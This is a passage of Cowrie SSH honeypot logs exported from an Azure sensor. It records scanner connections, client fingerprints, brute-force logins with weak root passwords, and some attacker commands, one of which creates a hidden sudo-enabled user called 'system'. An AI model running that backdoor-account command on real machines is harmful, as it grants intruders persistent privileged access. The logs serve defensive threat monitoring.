p384-cert-v01@openssh.com"",""ecdsa-sha2-nistp521-cert-v01@openssh.com"",""ssh-ed25519-cert-v01@openssh.com"",""ecdsa-sha2-nistp256"",""ecdsa-sha2-nistp384"",""ecdsa-sha2-nistp521"",""ssh-rsa"",""ssh-dss"",""ssh-ed25519"",""ssh-rsa-cert-v01@openssh.com"",""ssh-dss-cert-v01@openssh.com"",""ecdsa-sha2-nistp256-cert-v01@openssh.com"",""ecdsa-sha2-nistp384-cert-v01@openssh.com"",""ecdsa-sha2-nistp521-cert-v01@openssh.com"",""ssh-ed25519-cert-v01@openssh.com"",""ecdsa-sha2-nistp256"",""ecdsa-sha2-nistp384"",""ecdsa-sha2-nistp521"",""ssh-rsa"",""ssh-dss"",""ssh-ed25519""],""encCS"":[""aes128-ctr"",""aes192-ctr"",""aes256-ctr"",""aes128-gcm@openssh.com"",""arcfour256"",""arcfour128"",""aes128-ctr"",""aes192-ctr"",""aes256-ctr"",""aes128-gcm@openssh.com"",""arcfour256"",""arcfour128"",""aes128-cbc"",""3des-cbc"",""arcfour""],""macCS"":[""hmac-sha2-256"",""hmac-sha1"",""hmac-sha1-96""],""compCS"":[""none""],""langCS"":[""""],""message"":""SSH client hassh fingerprint: 7216c7c473918b4f83d1139b3c70dbf9"",""sensor"":""server01"",""timestamp"":""2024-09-20T15:57:28.336915Z"",""src_ip"":""64.62.197.137"",""session"":""8816a9320164""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 3:57:32.259 PM",,"{""eventid"":""cowrie.session.closed"",""duration"":3.9980390071868896,""message"":""Connection lost after 3 seconds"",""sensor"":""server01"",""timestamp"":""2024-09-20T15:57:32.258948Z"",""src_ip"":""64.62.197.137"",""session"":""8816a9320164""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 4:41:18.363 PM",,"{""eventid"":""cowrie.session.connect"",""src_ip"":""147.185.132.24"",""src_port"":61974,""dst_ip"":""10.0.0.4"",""dst_port"":2222,""session"":""f429a2a09e9a"",""protocol"":""ssh"",""message"":""New connection: 147.185.132.24:61974 (10.0.0.4:2222) [session: f429a2a09e9a]"",""sensor"":""server01"",""timestamp"":""2024-09-20T16:41:18.101383Z""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 4:41:19.191 PM",,"{""eventid"":""cowrie.client.version"",""version"":""SSH-2.0-ZGrab ZGrab SSH Survey"",""message"":""Remote SSH version: SSH-2.0-ZGrab ZGrab SSH Survey"",""sensor"":""server01"",""timestamp"":""2024-09-20T16:41:19.190111Z"",""src_ip"":""147.185.132.24"",""session"":""f429a2a09e9a""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 4:41:19.885 PM",,"{""eventid"":""cowrie.client.kex"",""hassh"":""dd9bcf093c355da7000132131cb36fd0"",""hasshAlgorithms"":""diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,arcfour256,arcfour128,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,aes192-cbc,aes256-cbc,arcfour,rijndael-cbc@lysator.liu.se;hmac-md5-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-ripemd160-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,hmac-md5,hmac-sha1,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-ripemd160,hmac-ripemd160@openssh.com,hmac-sha1-96,hmac-md5-96;none,zlib@openssh.com,zlib"",""kexAlgs"":[""diffie-hellman-group-exchange-sha256"",""diffie-hellman-group-exchange-sha1"",""diffie-hellman-group14-sha1"",""diffie-hellman-group1-sha1""],""keyAlgs"":[""ecdsa-sha2-nistp256-cert-v01@openssh.com"",""ecdsa-sha2-nistp384-cert-v01@openssh.com"",""ecdsa-sha2-nistp521-cert-v01@openssh.com"",""ecdsa-sha2-nistp256"",""ecdsa-sha2-nistp384"",""ecdsa-sha2-nistp521"",""ssh-ed25519-cert-v01@openssh.com"",""ssh-rsa-cert-v01@openssh.com"",""ssh-dss-cert-v01@openssh.com"",""ssh-rsa-cert-v00@openssh.com"",""ssh-dss-cert-v00@openssh.com"",""ssh-ed25519"",""ssh-rsa"",""ssh-dss""],""encCS"":[""aes128-ctr"",""aes192-ctr"",""aes256-ctr"",""arcfour256"",""arcfour128"",""aes128-gcm@openssh.com"",""aes256-gcm@openssh.com"",""chacha20-poly1305@openssh.com"",""aes128-cbc"",""3des-cbc"",""blowfish-cbc"",""cast128-cbc"",""aes192-cbc"",""aes256-cbc"",""arcfour"",""rijndael-cbc@lysator.liu.se""],""macCS"":[""hmac-md5-etm@openssh.com"",""hmac-sha1-etm@openssh.com"",""umac-64-etm@openssh.com"",""umac-128-etm@openssh.com"",""hmac-sha2-256-etm@openssh.com"",""hmac-sha2-512-etm@openssh.com"",""hmac-ripemd160-etm@openssh.com"",""hmac-sha1-96-etm@openssh.com"",""hmac-md5-96-etm@openssh.com"",""hmac-md5"",""hmac-sha1"",""umac-64@openssh.com"",""umac-128@openssh.com"",""hmac-sha2-256"",""hmac-sha2-512"",""hmac-ripemd160"",""hmac-ripemd160@openssh.com"",""hmac-sha1-96"",""hmac-md5-96""],""compCS"":[""none"",""zlib@openssh.com"",""zlib""],""langCS"":[""""],""message"":""SSH client hassh fingerprint: dd9bcf093c355da7000132131cb36fd0"",""sensor"":""server01"",""timestamp"":""2024-09-20T16:41:19.883106Z"",""src_ip"":""147.185.132.24"",""session"":""f429a2a09e9a""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 4:41:22.050 PM",,"{""eventid"":""cowrie.session.closed"",""duration"":3.946960926055908,""message"":""Connection lost after 3 seconds"",""sensor"":""server01"",""timestamp"":""2024-09-20T16:41:22.049649Z"",""src_ip"":""147.185.132.24"",""session"":""f429a2a09e9a""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 5:57:42.753 PM",,"{""eventid"":""cowrie.session.connect"",""src_ip"":""183.81.169.238"",""src_port"":33148,""dst_ip"":""10.0.0.4"",""dst_port"":2222,""session"":""6a5ffb57f5d1"",""protocol"":""ssh"",""message"":""New connection: 183.81.169.238:33148 (10.0.0.4:2222) [session: 6a5ffb57f5d1]"",""sensor"":""server01"",""timestamp"":""2024-09-20T17:57:42.752535Z""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 5:57:43.061 PM",,"{""eventid"":""cowrie.client.version"",""version"":""SSH-2.0-Go"",""message"":""Remote SSH version: SSH-2.0-Go"",""sensor"":""server01"",""timestamp"":""2024-09-20T17:57:43.060419Z"",""src_ip"":""183.81.169.238"",""session"":""6a5ffb57f5d1""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 5:57:43.065 PM",,"{""eventid"":""cowrie.client.kex"",""hassh"":""4e066189c3bbeec38c99b1855113733a"",""hasshAlgorithms"":""curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none"",""kexAlgs"":[""curve25519-sha256"",""curve25519-sha256@libssh.org"",""ecdh-sha2-nistp256"",""ecdh-sha2-nistp384"",""ecdh-sha2-nistp521"",""diffie-hellman-group14-sha256"",""diffie-hellman-group14-sha1"",""ext-info-c""],""keyAlgs"":[""rsa-sha2-512-cert-v01@openssh.com"",""rsa-sha2-256-cert-v01@openssh.com"",""ssh-rsa-cert-v01@openssh.com"",""ssh-dss-cert-v01@openssh.com"",""ecdsa-sha2-nistp256-cert-v01@openssh.com"",""ecdsa-sha2-nistp384-cert-v01@openssh.com"",""ecdsa-sha2-nistp521-cert-v01@openssh.com"",""ssh-ed25519-cert-v01@openssh.com"",""ecdsa-sha2-nistp256"",""ecdsa-sha2-nistp384"",""ecdsa-sha2-nistp521"",""rsa-sha2-512"",""rsa-sha2-256"",""ssh-rsa"",""ssh-dss"",""ssh-ed25519""],""encCS"":[""aes128-gcm@openssh.com"",""chacha20-poly1305@openssh.com"",""aes128-ctr"",""aes192-ctr"",""aes256-ctr""],""macCS"":[""hmac-sha2-256-etm@openssh.com"",""hmac-sha2-256"",""hmac-sha1"",""hmac-sha1-96""],""compCS"":[""none""],""langCS"":[""""],""message"":""SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a"",""sensor"":""server01"",""timestamp"":""2024-09-20T17:57:43.062170Z"",""src_ip"":""183.81.169.238"",""session"":""6a5ffb57f5d1""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 5:57:44.906 PM",,"{""eventid"":""cowrie.login.success"",""username"":""root"",""password"":""0"",""message"":""login attempt [root/0] succeeded"",""sensor"":""server01"",""timestamp"":""2024-09-20T17:57:44.906087Z"",""src_ip"":""183.81.169.238"",""session"":""6a5ffb57f5d1""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 5:57:45.587 PM",,"{""eventid"":""cowrie.session.params"",""arch"":""linux-x64-lsb"",""message"":[],""sensor"":""server01"",""timestamp"":""2024-09-20T17:57:45.585066Z"",""src_ip"":""183.81.169.238"",""session"":""6a5ffb57f5d1""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 5:57:45.588 PM",,"{""eventid"":""cowrie.command.input"",""input"":""apt update && apt install sudo curl -y && sudo useradd -m -p $(openssl passwd -1 Kd6bHUYw) system && sudo usermod -aG sudo system"",""message"":""CMD: apt update && apt install sudo curl -y && sudo useradd -m -p $(openssl passwd -1 Kd6bHUYw) system && sudo usermod -aG sudo system"",""sensor"":""server01"",""timestamp"":""2024-09-20T17:57:45.587543Z"",""src_ip"":""183.81.169.238"",""session"":""6a5ffb57f5d1""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 5:57:45.589 PM",,"{""eventid"":""cowrie.command.input"",""input"":""openssl passwd -1 Kd6bHUYw"",""message"":""CMD: openssl passwd -1 Kd6bHUYw"",""sensor"":""server01"",""timestamp"":""2024-09-20T17:57:45.588671Z"",""src_ip"":""183.81.169.238"",""session"":""6a5ffb57f5d1""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 5:57:45.590 PM",,"{""eventid"":""cowrie.command.failed"",""input"":""openssl passwd -1 Kd6bHUYw"",""message"":""Command not found: openssl passwd -1 Kd6bHUYw"",""sensor"":""server01"",""timestamp"":""2024-09-20T17:57:45.590097Z"",""src_ip"":""183.81.169.238"",""session"":""6a5ffb57f5d1""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 5:57:45.593 PM",,"{""eventid"":""cowrie.command.failed"",""input"":""apt update"",""message"":""Command not found: apt update"",""sensor"":""server01"",""timestamp"":""2024-09-20T17:57:45.592261Z"",""src_ip"":""183.81.169.238"",""session"":""6a5ffb57f5d1""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 5:57:45.595 PM",,"{""eventid"":""cowrie.command.failed"",""input"":""apt install sudo curl -y"",""message"":""Command not found: apt install sudo curl -y"",""sensor"":""server01"",""timestamp"":""2024-09-20T17:57:45.593972Z"",""src_ip"":""183.81.169.238"",""session"":""6a5ffb57f5d1""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 5:57:45.897 PM",,"{""eventid"":""cowrie.log.closed"",""ttylog"":""var/lib/cowrie/tty/fcbf76ccad3270aa8b28e173616cb5e41c85fd8194e050be0d54997bd8877d7e"",""size"":725,""shasum"":""fcbf76ccad3270aa8b28e173616cb5e41c85fd8194e050be0d54997bd8877d7e"",""duplicate"":false,""duration"":0.31137514114379883,""message"":""Closing TTY Log: var/lib/cowrie/tty/fcbf76ccad3270aa8b28e173616cb5e41c85fd8194e050be0d54997bd8877d7e after 0 seconds"",""sensor"":""server01"",""timestamp"":""2024-09-20T17:57:45.896042Z"",""src_ip"":""183.81.169.238"",""session"":""6a5ffb57f5d1""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 5:57:45.899 PM",,"{""eventid"":""cowrie.session.closed"",""duration"":3.144550085067749,""message"":""Connection lost after 3 seconds"",""sensor"":""server01"",""timestamp"":""2024-09-20T17:57:45.898667Z"",""src_ip"":""183.81.169.238"",""session"":""6a5ffb57f5d1""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 7:12:34.362 PM",,"{""eventid"":""cowrie.session.connect"",""src_ip"":""222.71.54.18"",""src_port"":2620,""dst_ip"":""10.0.0.4"",""dst_port"":2222,""session"":""dcdf040c7fb2"",""protocol"":""ssh"",""message"":""New connection: 222.71.54.18:2620 (10.0.0.4:2222) [session: dcdf040c7fb2]"",""sensor"":""server01"",""timestamp"":""2024-09-20T19:12:34.361296Z""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 7:12:35.488 PM",,"{""eventid"":""cowrie.session.closed"",""duration"":1.12491774559021,""message"":""Connection lost after 1 seconds"",""sensor"":""server01"",""timestamp"":""2024-09-20T19:12:35.487596Z"",""src_ip"":""222.71.54.18"",""session"":""dcdf040c7fb2""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 7:12:35.778 PM",,"{""eventid"":""cowrie.session.connect"",""src_ip"":""222.71.54.18"",""src_port"":24510,""dst_ip"":""10.0.0.4"",""dst_port"":2222,""session"":""5777b601e7df"",""protocol"":""ssh"",""message"":""New connection: 222.71.54.18:24510 (10.0.0.4:2222) [session: 5777b601e7df]"",""sensor"":""server01"",""timestamp"":""2024-09-20T19:12:35.777374Z""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 7:12:51.220 PM",,"{""eventid"":""cowrie.client.version"",""version"":""SSH-2.0-Go"",""message"":""Remote SSH version: SSH-2.0-Go"",""sensor"":""server01"",""timestamp"":""2024-09-20T19:12:51.219392Z"",""src_ip"":""222.71.54.18"",""session"":""5777b601e7df""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 7:12:51.223 PM",,"{""eventid"":""cowrie.client.kex"",""hassh"":""98f63c4d9c87edbd97ed4747fa031019"",""hasshAlgorithms"":""curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none"",""kexAlgs"":[""curve25519-sha256"",""curve25519-sha256@libssh.org"",""ecdh-sha2-nistp256"",""ecdh-sha2-nistp384"",""ecdh-sha2-nistp521"",""diffie-hellman-group14-sha256"",""diffie-hellman-group14-sha1"",""ext-info-c""],""keyAlgs"":[""rsa-sha2-256-cert-v01@openssh.com"",""rsa-sha2-512-cert-v01@openssh.com"",""ssh-rsa-cert-v01@openssh.com"",""ssh-dss-cert-v01@openssh.com"",""ecdsa-sha2-nistp256-cert-v01@openssh.com"",""ecdsa-sha2-nistp384-cert-v01@openssh.com"",""ecdsa-sha2-nistp521-cert-v01@openssh.com"",""ssh-ed25519-cert-v01@openssh.com"",""ecdsa-sha2-nistp256"",""ecdsa-sha2-nistp384"",""ecdsa-sha2-nistp521"",""rsa-sha2-256"",""rsa-sha2-512"",""ssh-rsa"",""ssh-dss"",""ssh-ed25519""],""encCS"":[""aes128-gcm@openssh.com"",""aes256-gcm@openssh.com"",""chacha20-poly1305@openssh.com"",""aes128-ctr"",""aes192-ctr"",""aes256-ctr""],""macCS"":[""hmac-sha2-256-etm@openssh.com"",""hmac-sha2-512-etm@openssh.com"",""hmac-sha2-256"",""hmac-sha2-512"",""hmac-sha1"",""hmac-sha1-96""],""compCS"":[""none""],""langCS"":[""""],""message"":""SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019"",""sensor"":""server01"",""timestamp"":""2024-09-20T19:12:51.220931Z"",""src_ip"":""222.71.54.18"",""session"":""5777b601e7df""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 7:12:52.893 PM",,"{""eventid"":""cowrie.login.success"",""username"":""root"",""password"":""---fuck_you----"",""message"":""login attempt [root/---fuck_you----] succeeded"",""sensor"":""server01"",""timestamp"":""2024-09-20T19:12:52.892271Z"",""src_ip"":""222.71.54.18"",""session"":""5777b601e7df""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 7:12:53.419 PM",,"{""eventid"":""cowrie.session.params"",""arch"":""linux-x64-lsb"",""message"":[],""sensor"":""server01"",""timestamp"":""2024-09-20T19:12:53.418676Z"",""src_ip"":""222.71.54.18"",""session"":""5777b601e7df""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 7:12:53.421 PM",,"{""eventid"":""cowrie.command.input"",""input"":""uname -s -m"",""message"":""CMD: uname -s -m"",""sensor"":""server01"",""timestamp"":""2024-09-20T19:12:53.420017Z"",""src_ip"":""222.71.54.18"",""session"":""5777b601e7df""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 7:12:53.687 PM",,"{""eventid"":""cowrie.log.closed"",""ttylog"":""var/lib/cowrie/tty/6fa4c8ac58e7a1d947dc3250c39d1e27958f012e68061d8de0a7b70e3a65b906"",""size"":13,""shasum"":""6fa4c8ac58e7a1d947dc3250c39d1e27958f012e68061d8de0a7b70e3a65b906"",""duplicate"":true,""duration"":0.2677001953125,""message"":""Closing TTY Log: var/lib/cowrie/tty/6fa4c8ac58e7a1d947dc3250c39d1e27958f012e68061d8de0a7b70e3a65b906 after 0 seconds"",""sensor"":""server01"",""timestamp"":""2024-09-20T19:12:53.686022Z"",""src_ip"":""222.71.54.18"",""session"":""5777b601e7df""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 7:12:53.689 PM",,"{""eventid"":""cowrie.session.closed"",""duration"":17.909624814987183,""message"":""Connection lost after 17 seconds"",""sensor"":""server01"",""timestamp"":""2024-09-20T19:12:53.688303Z"",""src_ip"":""222.71.54.18"",""session"":""5777b601e7df""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 7:18:28.257 PM",,"{""eventid"":""cowrie.session.connect"",""src_ip"":""45.79.181.104"",""src_port"":34888,""dst_ip"":""10.0.0.4"",""dst_port"":2222,""session"":""06e637a0e45a"",""protocol"":""ssh"",""message"":""New connection: 45.79.181.104:34888 (10.0.0.4:2222) [session: 06e637a0e45a]"",""sensor"":""server01"",""timestamp"":""2024-09-20T19:18:28.256185Z""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 7:18:28.258 PM",,"{""eventid"":""cowrie.client.version"",""version"":""SSH-2.0-Go"",""message"":""Remote SSH version: SSH-2.0-Go"",""sensor"":""server01"",""timestamp"":""2024-09-20T19:18:28.257760Z"",""src_ip"":""45.79.181.104"",""session"":""06e637a0e45a""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 7:18:28.267 PM",,"{""eventid"":""cowrie.client.kex"",""hassh"":""4e066189c3bbeec38c99b1855113733a"",""hasshAlgorithms"":""curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none"",""kexAlgs"":[""curve25519-sha256"",""curve25519-sha256@libssh.org"",""ecdh-sha2-nistp256"",""ecdh-sha2-nistp384"",""ecdh-sha2-nistp521"",""diffie-hellman-group14-sha256"",""diffie-hellman-group14-sha1"",""ext-info-c""],""keyAlgs"":[""rsa-sha2-512-cert-v01@openssh.com"",""rsa-sha2-256-cert-v01@openssh.com"",""ssh-rsa-cert-v01@openssh.com"",""rsa-sha2-512"",""rsa-sha2-256"",""ssh-rsa""],""encCS"":[""aes128-gcm@openssh.com"",""chacha20-poly1305@openssh.com"",""aes128-ctr"",""aes192-ctr"",""aes256-ctr""],""macCS"":[""hmac-sha2-256-etm@openssh.com"",""hmac-sha2-256"",""hmac-sha1"",""hmac-sha1-96""],""compCS"":[""none""],""langCS"":[""""],""message"":""SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a"",""sensor"":""server01"",""timestamp"":""2024-09-20T19:18:28.266037Z"",""src_ip"":""45.79.181.104"",""session"":""06e637a0e45a""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 7:18:28.279 PM",,"{""eventid"":""cowrie.session.closed"",""duration"":0.020731210708618164,""message"":""Connection lost after 0 seconds"",""sensor"":""server01"",""timestamp"":""2024-09-20T19:18:28.278342Z"",""src_ip"":""45.79.181.104"",""session"":""06e637a0e45a""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 7:18:28.288 PM",,"{""eventid"":""cowrie.session.connect"",""src_ip"":""45.79.181.104"",""src_port"":34890,""dst_ip"":""10.0.0.4"",""dst_port"":2222,""session"":""36f4dcfabbcb"",""protocol"":""ssh"",""message"":""New connection: 45.79.181.104:34890 (10.0.0.4:2222) [session: 36f4dcfabbcb]"",""sensor"":""server01"",""timestamp"":""2024-09-20T19:18:28.286948Z""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 7:18:28.289 PM",,"{""eventid"":""cowrie.client.version"",""version"":""SSH-2.0-Go"",""message"":""Remote SSH version: SSH-2.0-Go"",""sensor"":""server01"",""timestamp"":""2024-09-20T19:18:28.288619Z"",""src_ip"":""45.79.181.104"",""session"":""36f4dcfabbcb""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 7:18:28.299 PM",,"{""eventid"":""cowrie.client.kex"",""hassh"":""4e066189c3bbeec38c99b1855113733a"",""hasshAlgorithms"":""curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none"",""kexAlgs"":[""curve25519-sha256"",""curve25519-sha256@libssh.org"",""ecdh-sha2-nistp256"",""ecdh-sha2-nistp384"",""ecdh-sha2-nistp521"",""diffie-hellman-group14-sha256"",""diffie-hellman-group14-sha1"",""ext-info-c""],""keyAlgs"":[""ecdsa-sha2-nistp256-cert-v01@openssh.com"",""ecdsa-sha2-nistp384-cert-v01@openssh.com"",""ecdsa-sha2-nistp521-cert-v01@openssh.com"",""ecdsa-sha2-nistp256"",""ecdsa-sha2-nistp384"",""ecdsa-sha2-nistp521""],""encCS"":[""aes128-gcm@openssh.com"",""chacha20-poly1305@openssh.com"",""aes128-ctr"",""aes192-ctr"",""aes256-ctr""],""ma